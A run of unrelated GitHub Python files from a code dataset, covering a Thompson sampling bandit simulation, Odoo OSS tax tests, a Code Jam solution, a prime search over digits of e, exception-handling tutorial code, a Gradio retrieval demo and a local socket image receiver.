outer()
| SumathKetharaju/Sumanth_Uploads | sumanth_Initial_Programs/local_global.py | local_global.py | py | 237 | python | en | code | 1 | github-code | 50 |
32006979748 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 17:03:58 2018
@author: bangyc
"""
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(618)
# number of arm
K = 5
# probability distribution
true_prob = [1/6, 1/2, 2/3, 3/4, 5/6]
beta_prior_alpha1 = [1, 1, 1, 1, 1]
beta_prior_alpha2 = [1, 1, 1, 1, 1]
beta_post_alpha1 = beta_prior_alpha1
beta_post_alpha2 = beta_prior_alpha2
# total times
T = 666
rewards = []
regrets = []
avg_regrets = []
N = [0, 0, 0, 0, 0]
average_n = []
for t in np.arange(T):
sampled_post = []
for k in np.arange(K):
sampled = np.random.beta(beta_post_alpha1[k], beta_post_alpha2[k])
sampled_post.append(sampled)
action = np.argmax(sampled_post)
# pulled Arm to get reward
reward = np.random.binomial(1, true_prob[action])
regret = 5/6 - reward
N[action] = N[action] + 1
average_n.append(list(map(lambda x: x / (t + 1), N)))
rewards.append(reward)
regrets.append(regret)
avg_regrets.append(np.mean(regrets))
# update the posterior
beta_post_alpha1[action] = beta_post_alpha1[action] + reward
beta_post_alpha2[action] = beta_post_alpha2[action] + 1 - reward
count = 0
for t in np.arange(T):
if average_n[t][4] > 0.95:
count += 1
if count >= 10:
print("the first time achieve 0.95 and stays 10 steps: %d" % t)
break
else:
count = 0
average_n = np.array(average_n)
estimate_prob = list(map(lambda x, y: x / (x + y), beta_post_alpha1, beta_post_alpha2))
estimate_error = list(map(lambda x, y: 2 * np.sqrt(x*y/((x + y + 1) * (x + y)**2)), beta_post_alpha1, beta_post_alpha2))
# plot average regret vs time
plt.figure(1)
# plt.title("average regret vs time")
plt.xlabel("time")
plt.ylabel("average regret")
plt.plot(np.arange(1, T + 1), avg_regrets)
plt.savefig('q3.png')
plt.close()
# plot true mu, estimate mu and its confidence interval vs arm k
plt.figure(2)
# plt.title("mu vs arm K")
plt.xlabel("K")
plt.ylabel("Mu")
plt.scatter(range(1, 6), true_prob, c='orange')
plt.errorbar(range(1, 6), estimate_prob, yerr=estimate_error, fmt='o', c='blue')
plt.savefig('q4.png')
plt.close()
# plot
plt.figure(3)
# plt.title("average number vs time")
index = np.arange(1, T+1)
a1, = plt.plot(index, average_n[:,0])
a2, = plt.plot(index, average_n[:,1])
a3, = plt.plot(index, average_n[:,2])
a4, = plt.plot(index, average_n[:,3])
a5, = plt.plot(index, average_n[:,4])
plt.legend([a1, a2, a3, a4, a5], ['k=1', 'k=2', 'k=3', 'k=4', 'k=5'])
plt.savefig('q5.png')
plt.close() | yangjh39/CSE-547-ML-for-Big-Data | Tompson Sampling/Tompson Sampling.py | Tompson Sampling.py | py | 2,570 | python | en | code | 0 | github-code | 50 |
11026558740 | # -*- coding: utf-8 -*-
from odoo.addons.l10n_eu_oss.models.eu_tag_map import EU_TAG_MAP
from odoo.addons.account.tests.common import AccountTestInvoicingCommon
from odoo.tests import tagged
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSBelgium(AccountTestInvoicingCommon):
@classmethod
def setUpClass(self, chart_template_ref='l10n_be.l10nbe_chart_template'):
try:
super().setUpClass(chart_template_ref=chart_template_ref)
except ValueError as e:
if e.args[0] == "External ID not found in the system: l10n_be.l10nbe_chart_template":
self.skipTest(self, reason="Belgian CoA is required for this testSuite but l10n_be isn't installed")
else:
raise e
self.company_data['company'].country_id = self.env.ref('base.be')
self.company_data['company']._map_eu_taxes()
def test_country_tag_from_belgium(self):
# get an eu country which isn't the current one:
another_eu_country_code = (self.env.ref('base.europe').country_ids - self.company_data['company'].country_id)[0].code
tax_oss = self.env['account.tax'].search([('name', 'ilike', f'%{another_eu_country_code}%')], limit=1)
for doc_type, report_line_xml_id in (
("invoice", "l10n_be.tax_report_line_47"),
("refund", "l10n_be.tax_report_line_49"),
):
with self.subTest(doc_type=doc_type, report_line_xml_id=report_line_xml_id):
oss_tag_id = tax_oss[f"{doc_type}_repartition_line_ids"]\
.filtered(lambda x: x.repartition_type == 'base')\
.tag_ids
expected_tag_id = self.env.ref(report_line_xml_id)\
.tag_ids\
.filtered(lambda t: not t.tax_negate)
self.assertIn(expected_tag_id, oss_tag_id, f"{doc_type} tag from Belgian CoA not correctly linked")
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSUSA(AccountTestInvoicingCommon):
@classmethod
def setUpClass(self, chart_template_ref=None):
super().setUpClass(chart_template_ref=chart_template_ref)
self.company_data['company'].country_id = self.env.ref('base.us')
self.company_data['company']._map_eu_taxes()
def test_no_oss_tax(self):
# get an eu country which isn't the current one:
another_eu_country_code = (self.env.ref('base.europe').country_ids - self.company_data['company'].country_id)[0].code
tax_oss = self.env['account.tax'].search([('name', 'ilike', f'%{another_eu_country_code}%')], limit=1)
self.assertFalse(len(tax_oss), "OSS tax shouldn't be instanced on a US company")
@tagged('post_install', 'post_install_l10n', '-at_install')
class TestOSSMap(AccountTestInvoicingCommon):
def test_oss_eu_tag_map(self):
""" Checks that the xml_id referenced in the map are correct.
In case of failure display the couple (chart_template_xml_id, tax_report_line_xml_id).
The test doesn't fail for unreferenced char_template or unreferenced tax_report_line.
"""
chart_templates = self.env['account.chart.template'].search([])
for chart_template in chart_templates:
[chart_template_xml_id] = chart_template.get_xml_id().values()
oss_tags = EU_TAG_MAP.get(chart_template_xml_id, {})
for tax_report_line_xml_id in filter(lambda d: d, oss_tags.values()):
with self.subTest(chart_template_xml_id=chart_template_xml_id, tax_report_line_xml_id=tax_report_line_xml_id):
tag = self.env.ref(tax_report_line_xml_id, raise_if_not_found=False)
self.assertIsNotNone(tag, f"The following xml_id is incorrect in EU_TAG_MAP.py:{tax_report_line_xml_id}")
| anhjean/beanbakery_v15 | addons/l10n_eu_oss/tests/test_oss.py | test_oss.py | py | 3,836 | python | en | code | 5 | github-code | 50 |
33490538960 | f = open('A-small-attempt0.in')
out = open('a.txt', 'w')
T = int(f.readline().strip())
for case in range(T):
row1 = int(f.readline().strip())
for i in range(row1-1):
f.readline()
set1 = set(int(i) for i in f.readline().strip().split())
for i in range(4-row1):
f.readline()
row2 = int(f.readline().strip())
for i in range(row2-1):
f.readline()
set2 = set(int(i) for i in f.readline().strip().split())
for i in range(4-row2):
f.readline()
ans = set1 & set2
if len(ans) == 1:
output = str(ans.pop())
elif len(ans) > 1:
output = 'Bad magician!'
else:
output = 'Volunteer cheated!'
out.write('Case #%d: %s\n' % (case+1, output))
out.close()
f.close()
| wind1900/exercise | codejam2014/A.py | A.py | py | 754 | python | en | code | 2 | github-code | 50 |
36587083995 | def isprime(n):
n = abs(int(n))
if n < 2:return (False)
if n == 2:return (True)
if not n & 1: return (False)
for x in range(3, int(n**0.5)+1, 2):
if n % x == 0:return (False)
return (True)
def z(contfrac, a=1, b=0, c=0, d=1):
for x in contfrac:
while a > 0 and b > 0 and c > 0 and d > 0:
t = a // c
t2 = b // d
if not t == t2:
break
yield (t)
a = (10 * (a - c*t))
b = (10 * (b - d*t))
# continue with same fraction, don't pull new x
a, b = x*a+b, a
c, d = x*c+d, c
for digit in rdigits(a, c):
yield (digit)
def rdigits(p, q):
while p > 0:
if p > q:
d = p // q
p = p - q * d
else:
d = (10 * p) // q
p = 10 * p - q * d
yield (d)
def e_cf_expansion():
yield (1)
k = 0
while True:
yield (k)
k += 2
yield (1)
yield (1)
def e_dec():return z(e_cf_expansion())
def e_gen(n):
gen = e_dec()
e = [str(next(gen)) for i in range(n)]
#e.insert(1, '.')#inserting decimal
return(''.join(e))
#window loop
for location in range(1000):
num = int(e_gen(10000)[location:(10+location)])
val = isprime(num)
if val== True:
print (num)
break
#from google challenge in 2007 for a job at google
#{first 10-digit prime found in consecutive digits of e}.com
| cmrfrd/Random-Python | googlechallenge.py | googlechallenge.py | py | 1,466 | python | en | code | 0 | github-code | 50 |
25795503433 | try:
4/0
except ZeroDivisionError as e:
print(e)
# 4/0만 하면 ZeroDivisionError라는 애러가 뜬다
# 그렇기 때문에 try로 애러를 쓰고 except에 ZeroDivisionError를 미리 잡아주면 print했을때 애러의 종류가 출력된다.
try:
f = open('none', 'r')
except FileExistsError as e:
print(str(e))
else:
data = f.read()
print(data)
f.close()
# 파일이 없다면 e 출력
# 하지만 try에 오류가 없다면 else를 실행
a = open('apple.txt', 'w')
try:
# 무언가를 실행한다.
data = a.read()
print(data)
except Exception as e:
print(e)
finally:
f.close
# 파일을 처음 열었을때 닫아주기 위해 finally 사용
# 어떤 오류가 발생할지 모를때는 Exception 을 사용한다.
# 여러개의 오류 처리하는 방법
try:
a = [1,2]
print(a[3])
4/0
except ZeroDivisionError:
print("0으로 나눌 수 없습니다.")
except IndexError:
print("인덱싱할 수 없습니다.")
# except를 해서 여러개의 예외 처리를 할 수 있다.
try:
f = open("없는파일", 'r')
except FileNotFoundError:
pass
# 오류회피하기
class Bird:
def fly(self):
raise NotImplementedError
class Eagle(Bird):
def fly(self):
print("very fast")
eagle = Eagle()
eagle.fly()
# 일부러 오류 발생시키기
# raise뒤에 오류이름을 작성하면 오류가 발생한다. | SIRIJEONG/python | test39.py | test39.py | py | 1,430 | python | ko | code | 0 | github-code | 50 |
30877593895 | # -*- coding: utf-8 -*-
"""
Exercise 3: Area of a Room
Write a program that asks the user to enter the width and length of a room.
Once the value has been read, your proram should compute and display the area
of the room.
The length and the width will be entered as floating point numbers.
(include units in your prompt and output message in either ft or meters.) depending
on which unit you are more comfortable working with.
"""
width=input("Enter width of the room(ft):")
length=input("Enter length of the room(ft):")
#Convert string to float
area=float(width)*float(length)
print("Area of the room: ",area," square ft.")
| grypy/Introduction_Exercises | Room_Area.py | Room_Area.py | py | 653 | python | en | code | 0 | github-code | 50 |
2269258358 | #%%
import time
import asyncio
import pandas as pd
import gradio as gr
from utils import google
from utils.credentials import *
variables = {
"project_id": "vtxdemos",
"region": "us-central1",
"instance_name": "pg15-pgvector-demo",
"database_user": "emb-admin",
"database_password": DATABASE_PASSWORD,
"database_name": "rag-pgvector-langchain-1",
"docai_processor_id": "projects/254356041555/locations/us/processors/5f0b0deeb0a5d23b",
"location": "us"
}
client = google.Client(variables)
async def db_functions(documents, query):
await client.create_table()
await client.insert_documents_vdb(documents)
return await client.query(query)
# %%
# LLM prompt + context
def greet(file,name):
documents, ocr_time, embeddings_time = client.prepare_file(file.name)
start = time.time()
matches = asyncio.run(db_functions(documents, name))
vdb_time = time.time() - start
response = client.llm_predict(name, context=pd.DataFrame(matches).to_json())
x = str(response)
return str(response), f"ocr time: {ocr_time}", f"embeddings time: {embeddings_time}", f"vdb time: {vdb_time}"
demo = gr.Interface(
greet,
inputs=["file","text"],
outputs=["text", "text", "text", "text"],
title="Tax Return Analytics",
description="Tax Return Deloitte",
article="Jesus C",
css=".gradio-container {background-color: neutral}",
theme=gr.themes.Soft()
)
if __name__ == "__main__":
demo.launch(show_api=True, debug=True)
# %%
| jchavezar/vertex-ai-samples | gen_ai/rag/rag_upload_while_query_vertex.py | rag_upload_while_query_vertex.py | py | 1,518 | python | en | code | 10 | github-code | 50 |
13127491780 | import socket
import struct
import time
from PIL import Image
def recvall(receiver, buffer_size=65536):
data_buffer = b''
data_chunk=receiver.recv(buffer_size)
while len(data_chunk) >= buffer_size:
data_buffer+=data_chunk
data_chunk=receiver.recv(buffer_size)
data_buffer+=data_chunk
return data_buffer
def get_shape(sock):
shape = sock.recv(64)
shape = tuple(map(int,str(shape)[2:-1].split(',')))
return shape
def display(pixel_data,shape):
image = Image.frombytes("RGB", shape, pixel_data, 'raw')
image.show()
def join_image(image_parts):
return ''.join(image_parts)
def receive(host='127.0.0.1', port=1300):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as receiver:
receiver.connect((host, port))
receiver.send(bytes('im ready','utf-8'))
shape = get_shape(receiver)
pixel_data = recvall(receiver)
return pixel_data,shape
if __name__ == "__main__":
display(*receive())
| Trevahok/Python-VNC | trev_receiver.py | trev_receiver.py | py | 999 | python | en | code | 1 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.